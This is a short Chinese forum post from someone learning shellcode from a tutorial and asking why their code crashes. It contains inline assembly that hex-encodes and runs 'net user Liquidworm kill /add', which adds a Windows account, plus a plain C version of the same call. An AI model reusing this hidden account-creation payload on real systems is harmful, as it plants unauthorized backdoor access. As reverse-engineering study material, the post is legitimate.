今天看教程,但是在调试代码的时候有问题。
#include <windows.h>
#include <winbase.h>
void main(void)
{
LoadLibrary("msvcrt.dll");
__asm
{
mov esp,ebp
push ebp
mov ebp,esp
xor edi,edi
push edi
mov ebp,esp
sub esp,1dh
mov byte ptr [ebp-1dh],6eh
mov byte ptr [ebp-1ch],65h
mov byte ptr [ebp-1bh],74h
mov byte ptr [ebp-1ah],20h
mov byte ptr [ebp-19h],75h
mov byte ptr [ebp-18h],73h
mov byte ptr [ebp-17h],65h
mov byte ptr [ebp-16h],72h
mov byte ptr [ebp-15h],20h
mov byte ptr [ebp-14h],4ch
mov byte ptr [ebp-13h],69h
mov byte ptr [ebp-12h],71h
mov byte ptr [ebp-11h],75h
mov byte ptr [ebp-10h],69h
mov byte ptr [ebp-0fh],64h
mov byte ptr [ebp-0eh],77h
mov byte ptr [ebp-0dh],6fh
mov byte ptr [ebp-0ch],72h
mov byte ptr [ebp-0bh],6dh
mov byte ptr [ebp-0ah],20h
mov byte ptr [ebp-09h],6bh
mov byte ptr [ebp-08h],69h
mov byte ptr [ebp-07h],6ch
mov byte ptr [ebp-06h],6ch
mov byte ptr [ebp-05h],20h
mov byte ptr [ebp-04h],2fh
mov byte ptr [ebp-03h],61h
mov byte ptr [ebp-02h],64h
mov byte ptr [ebp-01h],64h
push esp
mov eax,0040eeb0h
call eax
}
}
/*
#include <windows.h>
void main(void)
{
LoadLibrary("msvcrt.dll");
system("net user Liquidworm Kill /add");
}
*/
呵呵,上面的asm代码不知道写的对不对啊。就是构造参数,然后把参数在入栈,最后调用system的地址。但是运行的时候有个错误框啊。
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)